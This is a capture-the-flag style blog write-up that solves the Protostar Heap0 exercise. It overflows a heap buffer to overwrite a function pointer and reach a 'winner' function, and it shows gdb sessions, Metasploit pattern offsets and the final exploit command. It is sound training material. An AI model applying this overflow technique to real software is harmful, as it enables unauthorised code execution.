Address
304 North Cardinal St.
Dorchester Center, MA 02124
Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM
I haven’t written about any binary exploitation in a while, so I decided to do a write-up for Protostar Heap0 on Exploit Exercises.
Protostar Heap0 – Introduction
I picked Heap0 in particular because I know that my heap skills are definitely lacking when compared to the stack. That, combined with LiveOverflow’s Use-after-free tutorial for Heap2 pushed me towards working through these.
Program Analysis
To start, I downloaded the code from the challenge’s page. I decided to perform everything locally, as I didn’t want to worry about having to download and set up a VM for the time being.
Once I had the code on my machine, I compiled it and took a glance at its basic usage.
root@kali:~/Documents/exploit-exercises/protostar# gcc -o heap0 -fno-stack-protector -m32 heap0.c heap0.c: In function 'main': heap0.c:32:9: warning: assignment from incompatible pointer type [-Wincompatible-pointer-types] f->fp = nowinner; ^ root@kali:~/Documents/exploit-exercises/protostar# ./heap0 data is at 0xe4e010, fp is at 0xe4e060 Segmentation fault root@kali:~/Documents/exploit-exercises/protostar# ./heap0 'A' data is at 0x9a2010, fp is at 0x9a2060 level has not been passed
Exploitation
Since name was only a 64 byte buffer, I wanted to see if a 100 character string would overflow it.
root@kali:~/Documents/exploit-exercises/protostar# gdb heap0 GNU gdb (Debian 7.11.1-2) 7.11.1 Copyright (C) 2016 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type "show copying" and "show warranty" for details. This GDB was configured as "x86_64-linux-gnu". Type "show configuration" for configuration details. For bug reporting instructions, please see: <http://www.gnu.org/software/gdb/bugs/>. Find the GDB manual and other documentation resources online at: <http://www.gnu.org/software/gdb/documentation/>. For help, type "help". Type "apropos word" to search for commands related to "word"... Reading symbols from heap0...(no debugging symbols found)...done. (gdb) r `python -c 'print "A" * 100'` Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A" * 100'` data is at 0x804b008, fp is at 0x804b050 Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()
As I expected, I was able to overwrite EIP with my A’s. Next I created a pattern to find the appropriate offset for EIP.
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
< ... snip ... >
(gdb) r 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
Starting program: /root/Documents/exploit-exercises/protostar/heap0 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A'
data is at 0x804b008, fp is at 0x804b050
Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()
I then loaded my new EIP into pattern_offset and got an offset of 72 characters.
root@kali:/usr/share/metasploit-framework/tools/exploit# ./pattern_offset.rb -q 0x41346341 -l 100
[*] Exact match at offset 72
Once I verified that my offset of 72 was correct, I was able to overwrite EIP with my “BBBB” string.
(gdb) r `python -c 'print "A"*72 + "BBBB"'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /root/Documents/exploit-exercises/protostar/heap0 `python -c 'print "A"*72 + "BBBB" + "C"*24'` data is at 0x804b008, fp is at 0x804b050 Program received signal SIGSEGV, Segmentation fault. 0x42424242 in ?? ()
The only thing left for me to do was obtain the address for the “winner” function, which was as simple as running a print command.
(gdb) print winner
$1 = {<text variable, no debug info>} 0x804849b <winner>
With everything in place, I was able to write my full exploit and pass the level!
root@kali:~/Documents/exploit-exercises/protostar# ./heap0 `python -c 'print "A"*72 + "\x9b\x84\x04\x08"'` data is at 0x8d59008, fp is at 0x8d59050 level passed
Protostar Heap0 – Conclusion
While Protostar Heap0 was a simpler exercise, I’m hoping to continue working through the rest of the heap challenges.
Ray Doyle is an avid pentester/security enthusiast/beer connoisseur who has worked in IT for almost 16 years now. From building machines and the software on them, to breaking into them and tearing it all down; he’s done it all. To show for it, he has obtained an OSCE, OSCP, eCPPT, GXPN, eWPT, eWPTX, SLAE, eMAPT, Security+, ICAgile CP, ITIL v3 Foundation, and even a sabermetrics certification!
He currently serves as a Senior Staff Adversarial Engineer for Avalara, and his previous position was a Principal Penetration Testing Consultant for Secureworks.
This page contains links to products that I may receive compensation from at no additional cost to you. View my Affiliate Disclosure page here. As an Amazon Associate, I earn from qualifying purchases.
